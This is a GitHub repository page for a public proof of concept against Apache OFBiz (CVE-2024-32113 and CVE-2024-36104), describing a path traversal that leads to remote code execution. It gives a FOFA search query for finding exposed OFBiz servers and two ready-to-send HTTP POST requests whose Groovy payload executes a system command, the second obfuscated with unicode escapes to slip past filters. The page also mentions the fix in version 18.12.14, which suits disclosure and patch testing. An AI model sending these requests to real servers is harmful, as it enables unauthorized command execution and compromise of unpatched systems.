Skip to content
/ CVE-2024-32113 Public

Apache OFBIZ Path traversal leading to RCE POC[CVE-2024-32113 & CVE-2024-36104]

issues.apache.org/jira/browse/ofbiz-13006

License

MIT license
24 stars 8 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Mr-xn/CVE-2024-32113

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2024-32113

Apache OFBIZ Path traversal leading to RCE EXP.

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.14[not include]. Users are recommended to upgrade to version 18.12.14, which fixes the issue.

fofa query

app="Apache_OFBiz"

POC

POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1:8443

groovyProgram=throw+new+Exception('id'.execute().text);

excute id with unicode.

POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1:8443

groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

SCR-20240603-uowf

refercence

About

Apache OFBIZ Path traversal leading to RCE POC[CVE-2024-32113 & CVE-2024-36104]

issues.apache.org/jira/browse/OFBIZ-13006

Topics

apache poc rce cve ofbiz rce-exploit cve-2024 cve-2024-32113 cve-2024-36104

Resources

Readme

License

MIT license
Activity

Stars

24 stars

Watchers

1 watching

Forks

8 forks
Report repository

Releases

No releases published

Packages

No packages published